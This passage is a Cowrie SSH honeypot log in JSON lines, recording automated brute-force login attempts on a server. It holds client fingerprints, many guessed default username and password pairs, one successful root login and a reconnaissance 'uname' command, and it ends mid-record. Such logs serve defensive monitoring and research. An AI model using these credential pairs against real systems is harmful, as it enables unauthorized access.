{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:24.954251Z","src_ip":"212.227.125.160","session":"0b7fe9bae674"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:25.126797Z","src_ip":"212.227.125.160","session":"0b7fe9bae674"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:26.187868Z","src_ip":"212.227.125.160","session":"0b7fe9bae674"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35222,"dst_ip":"1.2.3.4","dst_port":22,"session":"73faa0afe041","protocol":"ssh","message":"New connection: 212.227.125.160:35222 (1.2.3.4:22) [session: 73faa0afe041]","sensor":"my-vps","timestamp":"2025-08-26T11:41:30.838128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:30.842114Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:30.888006Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:41:31.092456Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:41:31.255052Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:41:31.255808Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:31.307673Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:31.309011Z","src_ip":"212.227.125.160","session":"73faa0afe041"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35990,"dst_ip":"1.2.3.4","dst_port":22,"session":"4388bad78f96","protocol":"ssh","message":"New connection: 212.227.125.160:35990 (1.2.3.4:22) [session: 4388bad78f96]","sensor":"my-vps","timestamp":"2025-08-26T11:41:37.796044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:37.797895Z","src_ip":"212.227.125.160","session":"4388bad78f96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:38.200467Z","src_ip":"212.227.125.160","session":"4388bad78f96"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:38.482055Z","src_ip":"212.227.125.160","session":"4388bad78f96"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41260,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3bd2648e461","protocol":"ssh","message":"New connection: 83.168.105.65:41260 (1.2.3.4:22) [session: c3bd2648e461]","sensor":"my-vps","timestamp":"2025-08-26T11:41:39.129749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:39.131063Z","src_ip":"83.168.105.65","session":"c3bd2648e461"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:39.168303Z","src_ip":"83.168.105.65","session":"c3bd2648e461"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:39.281457Z","src_ip":"83.168.105.65","session":"c3bd2648e461"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:40.123107Z","src_ip":"212.227.125.160","session":"4388bad78f96"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:40.320384Z","src_ip":"83.168.105.65","session":"c3bd2648e461"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36760,"dst_ip":"1.2.3.4","dst_port":22,"session":"37ad7c61c5de","protocol":"ssh","message":"New connection: 212.227.125.160:36760 (1.2.3.4:22) [session: 37ad7c61c5de]","sensor":"my-vps","timestamp":"2025-08-26T11:41:42.751379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:42.753921Z","src_ip":"212.227.125.160","session":"37ad7c61c5de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:42.801777Z","src_ip":"212.227.125.160","session":"37ad7c61c5de"}
{"eventid":"cowrie.login.failed","username":"cyberpanel","password":"cyberpanel","message":"login attempt [cyberpanel/cyberpanel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:43.480458Z","src_ip":"212.227.125.160","session":"37ad7c61c5de"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:44.570341Z","src_ip":"212.227.125.160","session":"37ad7c61c5de"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37112,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b39231e6958","protocol":"ssh","message":"New connection: 196.251.86.249:37112 (1.2.3.4:22) [session: 0b39231e6958]","sensor":"my-vps","timestamp":"2025-08-26T11:41:47.079606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:47.552891Z","src_ip":"196.251.86.249","session":"0b39231e6958"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:41:47.553572Z","src_ip":"196.251.86.249","session":"0b39231e6958"}
{"eventid":"cowrie.login.failed","username":"git","password":"654321","message":"login attempt [git/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:48.839980Z","src_ip":"196.251.86.249","session":"0b39231e6958"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37528,"dst_ip":"1.2.3.4","dst_port":22,"session":"015b3cf50ba5","protocol":"ssh","message":"New connection: 212.227.125.160:37528 (1.2.3.4:22) [session: 015b3cf50ba5]","sensor":"my-vps","timestamp":"2025-08-26T11:41:50.402570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:50.434023Z","src_ip":"212.227.125.160","session":"015b3cf50ba5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:50.465198Z","src_ip":"212.227.125.160","session":"015b3cf50ba5"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:50.558867Z","src_ip":"196.251.86.249","session":"0b39231e6958"}
{"eventid":"cowrie.login.failed","username":"niaoyun","password":"niaoyun","message":"login attempt [niaoyun/niaoyun] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:51.313342Z","src_ip":"212.227.125.160","session":"015b3cf50ba5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:52.365392Z","src_ip":"212.227.125.160","session":"015b3cf50ba5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52694,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3745fb86cb2","protocol":"ssh","message":"New connection: 83.168.105.65:52694 (1.2.3.4:22) [session: f3745fb86cb2]","sensor":"my-vps","timestamp":"2025-08-26T11:41:54.624558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:54.625473Z","src_ip":"83.168.105.65","session":"f3745fb86cb2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:54.662075Z","src_ip":"83.168.105.65","session":"f3745fb86cb2"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:54.779233Z","src_ip":"83.168.105.65","session":"f3745fb86cb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f278f78d7cb1","protocol":"ssh","message":"New connection: 212.227.125.160:38296 (1.2.3.4:22) [session: f278f78d7cb1]","sensor":"my-vps","timestamp":"2025-08-26T11:41:55.470802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:55.572524Z","src_ip":"212.227.125.160","session":"f278f78d7cb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:55.574100Z","src_ip":"212.227.125.160","session":"f278f78d7cb1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:55.817421Z","src_ip":"83.168.105.65","session":"f3745fb86cb2"}
{"eventid":"cowrie.login.failed","username":"devops","password":"devops","message":"login attempt [devops/devops] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:56.236720Z","src_ip":"212.227.125.160","session":"f278f78d7cb1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:57.290205Z","src_ip":"212.227.125.160","session":"f278f78d7cb1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63882,"dst_ip":"1.2.3.4","dst_port":22,"session":"00f38d7544b0","protocol":"ssh","message":"New connection: 217.72.205.35:63882 (1.2.3.4:22) [session: 00f38d7544b0]","sensor":"my-vps","timestamp":"2025-08-26T11:41:58.621700Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:58.622820Z","src_ip":"217.72.205.35","session":"00f38d7544b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39068,"dst_ip":"1.2.3.4","dst_port":22,"session":"27b82beb1e45","protocol":"ssh","message":"New connection: 212.227.125.160:39068 (1.2.3.4:22) [session: 27b82beb1e45]","sensor":"my-vps","timestamp":"2025-08-26T11:42:02.376222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:02.631581Z","src_ip":"212.227.125.160","session":"27b82beb1e45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecds